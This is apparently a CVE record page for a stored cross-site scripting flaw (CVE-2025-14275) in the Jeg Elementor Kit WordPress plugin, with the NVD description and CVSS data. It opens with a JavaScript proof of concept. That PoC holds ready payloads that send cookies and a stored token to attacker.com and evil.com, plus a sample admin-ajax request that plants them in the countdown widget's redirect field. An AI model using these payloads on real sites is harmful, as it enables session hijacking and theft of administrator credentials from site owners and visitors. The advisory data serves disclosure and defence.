CVE-2025-14275

// CVE-2025-14275 PoC - Stored XSS in Jeg Elementor Kit countdown widget // Author: Contributor+ level authenticated user // Step 1: Create or edit a countdown element via Elementor editor // Step 2: Inject XSS payload in the redirect field const xssPayload = ` <img src=x onerror=" fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie)) "> `; // Alternative payload - session hijacking const sessionHijackPayload = ` <script> document.addEventListener('DOMContentLoaded', function() { fetch('https://attacker.com/log?cookie=' + btoa(document.cookie)); }); </script> `; // Payload for admin redirect to malicious site const redirectPayload = ` javascript:fetch('https://evil.com/admin_panel?token='+localStorage.getItem('wp_token')) `; // Example: How the malicious data is stored in WordPress database // POST request to wp-admin/admin-ajax.php const exploitRequest = { action: 'elementor_ajax', commands: ['save_builder'], data: { container: { elements: [{ id: 'unique-element-id', widgetType: 'jkit_countdown', settings: { jkit_countdown_redirect_url: xssPayload, // Other countdown settings... } }] } } }; console.log('[+] CVE-2025-14275 PoC generated'); console.log('[+] Payload:', xssPayload); console.log('[+] When admin visits the page, cookie will be exfiltrated');

{"cve": {"id": "CVE-2025-14275", "sourceIdentifier": "[email protected]", "published": "2026-01-08T03:15:43.033", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.0.1 due to insufficient input sanitization in the countdown widget's redirect functionality. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary JavaScript that will execute when an administrator or other user views the page containing the malicious countdown element."}, {"lang": "es", "value": "El plugin Jeg Elementor Kit para WordPress es vulnerable a cross-site scripting almacenado en todas las versiones hasta la 3.0.1, inclusive, debido a una sanitización de entrada insuficiente en la funcionalidad de redirección del widget de cuenta regresiva. Esto permite a atacantes autenticados, con acceso de nivel Colaborador o superior, inyectar JavaScript arbitrario que se ejecutará cuando un administrador u otro usuario vea la página que contiene el elemento de cuenta regresiva malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/jeg-elementor-kit/tags/3.0.1/assets/js/elements/countdown.js#L1", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432624%40jeg-elementor-kit%2Ftrunk&old=3379532%40jeg-elementor-kit%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8fcb4047-5173-4d10-a4bb-72f1919b9203?source=cve", "source": "[email protected]"}]}}